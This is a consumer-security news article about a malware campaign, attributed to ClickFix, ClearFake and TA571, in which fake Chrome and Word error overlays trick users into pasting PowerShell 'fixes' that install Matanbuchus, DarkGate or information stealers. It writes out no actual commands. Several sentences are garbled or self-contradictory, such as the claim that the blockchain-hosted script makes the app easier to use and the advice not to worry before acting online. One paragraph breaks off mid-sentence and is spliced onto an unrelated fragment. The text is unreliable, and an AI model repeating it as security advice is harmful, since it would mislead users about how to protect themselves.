Hackers love to trick victims and do what they don't do otherwise, and the new malware campaign that is currently doing rounds online is a perfect example of this.

As reported by BleepingComputer, hackers are using fake Google Chrome and Microsoft Word errors to trick potential victims into running malicious PowerShell "fixes" that actually install malware.

This particular campaign has been very effective and has been used in attacks by multiple hacker groups (including the one behind ClearFake, a new group called ClickFix, and the TA571 group). 

Here's all you need to know about this new malware campaign, and how you can avoid it falling victim to the social engineering you use to infect your Windows PC with malware.

Similar to the previous ClearFake campaign, this new campaign uses overlays to display fake Chrome and Word errors. Potential victims will be asked to click the copy button containing "fix" for these fake errors. You must paste this copied code into the Windows Run dialog or Powershell prompt.

In a new report highlighting all the different attack chains used in the campaign, Proofpoint said that compromised websites that use Binance's smart chain contract to load malicious scripts hosted on the blockchain could also infect vulnerable Windows PCs with malware. It is also used to make it easier for the user to use the app.

This script performs some checks before displaying a fake Google Chrome warning that the web page in question is having a problem viewing. From here, you will be prompted to install the "Root Certificate" by copying the PowerShell script and running it in the Windows PowerShell (Administrator) console.

Running this PowerShell script will perform more checks to ensure that the device in question is a valid target before downloading additional payloads containing information-stealing malware.

Finally, there is also an email-based infection chain that uses HTML attachments similar to Word documents. They urge potential victims to install the "Word Online" extension to view documents, but like the other attack chains used in this campaign, "fixes" containing PowerShell commands must also be copied and pasted into PowerShell.

In this attack chain, PowerShell commands download and run either Msi files or Vbs scripts to infect the target PC with either Matanbuchus or DarkGate malware.

The 3 different attack chains used in this campaign all rely on the fact that most Windows users are not aware of the dangers associated with running unknown PowerShell commands on their PCs. This is why you should not copy and run your code unless you absolutely know what you are doing.

Similarly, you should make sure that Windows Defender is enabled and running on your PC so that you can catch malware dropped by these malicious PowerShell scripts. If you want even more protection, however, do not worry about things before doing something online, especially with Microsoft's built-in

campaigns that use overlays to trick potential victims, especially as they often come with extra things like VPNs and password managers. I would like to stop to think and take a minute. Hackers often try to instill a sense of urgency in their attacks to act without you thinking. Instead, try to read the messages carefully and examine them online to see if they are genuine. Even if you don't find any information online, in most cases, doing nothing is the best course of action.

Overlay attacks are very effective because they often appear as if they are coming from the software you are currently using. But by learning how they work and knowing what to watch out for, you can keep your devices and data safe.